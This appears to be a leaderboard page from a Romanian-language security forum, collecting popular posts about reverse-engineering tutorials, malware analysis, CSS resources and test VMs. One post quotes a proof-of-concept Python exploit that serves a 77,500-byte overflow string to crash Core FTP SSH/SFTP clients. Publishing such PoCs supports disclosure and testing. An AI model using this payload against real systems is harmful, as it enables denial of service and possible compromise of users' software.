Jump to content

Leaderboard

Popular Content

Showing content with the highest reputation on 11/28/16 in all areas

  1. https://spider2039.files.wordpress.com/2010/06/addison-wesley-windows-system-programming-4ed-mtshart2010.pdf
    3 points
  2. Bine ca si-a recapatat sunetul.
    2 points
  3. Se poate exporta, dar nu este posibil moka.
    1 point
  4. Intr-o luna, maxim doua, poti vedea toate videoclipurile. Nu mi se pare mult 140 USD (600 RON) pentru a putea invata o gramada de lucruri care pe viitor iti pot aduce lejer 1-2K euro pe luna.
    1 point
  5. Exploit code(s): =============== import socket print 'hyp3rlinx - Apparition Security' print 'Core FTP SSH/SFTP Remote Buffer Overflow / DOS\r\n' host='127.0.0.1' port = 22 s = socket.socket() payload="A"*77500 s.bind((host, port)) s.listen(5) print 'Listening on port... %i' %port print 'Connect to me!' while True: conn, addr = s.accept() conn.send(payload+'\r\n') conn.close() Exploitation Technique: ======================= Remote via
    1 point
  6. Nu sunt scumpe, ati putea incerca sa le cumparati.
    1 point
  7. Am dat de un site fain unde puteți învăța CSS într-un mod practic: http://cssreference.io/ Mai multe detalii: http://thenextweb.com/dd/2016/11/27/cssreference-io-gorgeous-visual-guide-css/
    1 point
  8. LINK Trebuie să ai cont Ubisoft pentru a beneficia de oferte. Ca să nu verificați în fiecare zi ce va apărea nou prin giveaway:
    1 point
  9. Cum bre.. Există kelogger
    1 point
  10. The idea of these series of tutorials is updating our original reversing course but using IDA PRO. Learning how to use it from scratch and work with the last Windows versions. In this case, I’m using Windows 10 Anniversary Update 64 bits with all the patches until October 29, 2016. WHY IDA PRO? Because while OllyDBG is just a 32 bit debugger in Windows User Mode, IDA PRO is a whole reversing tool that can be used in 32/64bits as a disassembler and debugger. It permits static reversing which can’t be done in OllyDBG and who learns how to use it, in spite of having a more complex learning curve, it allows him/her to work in Windows, Linux or Mac OS X natively By Ricardo Narvaja https://twitter.com/ricnar456 Engleza: traduse de Ivinson (1-12) Download: https://drive.google.com/drive/folders/0B13TW0I0f8O2ckd2T0lsbXRoYmc Spaniola: (1-16) Download: https://drive.google.com/drive/folders/0B13TW0I0f8O2X192M3VyajRjZUk Restul partilor vor aparea pe parcurs
    1 point
  11. Publicat pe 25 nov. 2016 This is the first part of a full analysis for a packed Fleercivet sample. We start with basic static analysis, detection name interpretation and unpacking.
    1 point
  12. La multean via @Gecko
    1 point
  13. Functie apelata static fara keyword static la declarare , functie apelata static din clasa deja instantata.
    1 point
  14. Test Microsoft Edge and versions of IE6 through IE11 using free virtual machines you download and manage locally. https://dev.windows.com/en-us/microsoft-edge/tools/vms/ About Your Virtual Machine: Please note that these virtual machines expire after 90 days. We recommend setting a snapshot when you first install the virtual machine which you can roll back to later.
    1 point
×
×
  • Create New...